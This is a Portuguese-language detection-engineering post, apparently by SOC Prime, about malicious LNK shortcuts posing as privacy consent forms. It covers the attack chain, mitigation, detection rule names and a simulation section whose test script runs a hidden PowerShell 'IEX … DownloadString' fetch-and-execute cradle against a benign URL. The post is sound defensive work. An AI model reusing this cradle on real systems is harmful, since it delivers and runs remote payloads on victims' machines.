SOC Prime Bias: High

19 Jun 2026 07:26 UTC

O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?

Author Photo
SOC Prime Team linkedin icon Seguir
O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores de ameaças estão distribuindo arquivos LNK maliciosos disfarçados como formulários de consentimento de privacidade para enganar os usuários a abri-los. Quando executados, esses arquivos de atalho lançam comandos PowerShell ofuscados que recuperam e executam cargas adicionais usando técnicas sem arquivo. A cadeia de ataque é projetada para roubar informações e implantar um carregador de backdoor que ajuda a preservar o acesso e a persistência.

Investigação

A investigação mostrou que os arquivos LNK embutem código PowerShell ofuscado responsável por baixar scripts posteriores. Esses scripts secundários incluem um downloader que obtém cargas úteis de serviços web legítimos e um carregador que os executa diretamente na memória. O autor da ameaça também abusa do Agendador de Tarefas do Windows para persistência e usa documentos de isca para fazer parecer que a atividade maliciosa é legítima.

Mitigação

As organizações devem impor verificação rigorosa de extensões de arquivos e alertar os usuários sobre arquivos LNK disfarçados como documentos comuns. As equipes de segurança devem monitorar de perto a atividade do Agendador de Tarefas, logs de execução do PowerShell e conexões de rede de saída. Os usuários também devem ser treinados para validar tanto o remetente quanto o caminho de entrega de qualquer arquivo recebido antes de abri-lo.

Resposta

Se essa atividade for detectada, os administradores devem revisar imediatamente entradas suspeitas do Agendador de Tarefas e a criação incomum de scripts PowerShell em diretórios acessíveis por usuários. Os logs do PowerShell devem ser analisados e as conexões externas devem ser rastreadas, especialmente aquelas envolvendo plataformas de nuvem legítimas ou serviços de armazenamento web. Uma investigação forense completa deve ser realizada em quaisquer scripts maliciosos identificados e tráfego de rede não autorizado.

Fluxo de Ataque

Detecções

Possível Descoberta de Informações do Sistema Usando Módulo Wmi PowerShell (via PowerShell)

Equipe SOC Prime
18 de junho de 2026

Possíveis Indicadores de Ofuscação de PowerShell (via PowerShell)

Equipe SOC Prime
18 de junho de 2026

Execução de Arquivo LNK Malicioso Levando a Download Externo e Conexões [Conexão de Rede do Windows]

Regras SOC Prime AI
18 de junho de 2026

Execução e Persistência de Arquivo LNK Malicioso via Agendador de Tarefas [Criação de Processo do Windows]

Regras SOC Prime AI
18 de junho de 2026

Arquivo LNK Malicioso Executando PowerShell Ofuscado [PowerShell do Windows]

Regras SOC Prime AI
18 de junho de 2026

Execução de Simulação

Pré-requisito: O Cheque Pré-Voo de Telemetria e Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.

  • Narrativa do Ataque & Comandos: O adversário busca estabelecer acesso inicial e baixar uma carga de malware de segunda fase. Para evitar a detecção por scanners de arquivos simples, usam um arquivo LNK (Atalho). Este arquivo LNK é projetado para executar powershell.exe em uma janela oculta. O comando passado para o PowerShell usa Invoke-Expression and DownloadString para puxar um script de uma URL remota. Isso imita ataques reais de “Living-off-the-Land” (LotL) onde binários legítimos são usados para executar ações maliciosas, visando burlar antivírus baseados em assinaturas tradicionais.

  • Script de Teste de Regressão:

    # 1. Defina a URL de destino (usando um site benigno para teste)
    $url = "https://www.google.com"
    
    # 2. Crie a string de carga útil maliciosa de PowerShell
    # Esta string é projetada para acionar a detecção de 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Crie um conteúdo de arquivo LNK fictício (Simulado)
    # Em um ataque real, este seria um arquivo .lnk binário. 
    # Aqui executamos o comando diretamente para garantir que o log ScriptBlock seja gerado para validação.
    Write-Host "[+] Simulando execução maliciosa de PowerShell via carga útil LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando de simulação executado. Verifique o Evento ID 4104."
  • Comandos de Limpeza:

    # Remova quaisquer artefatos se arquivos foram criados
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpeza completa."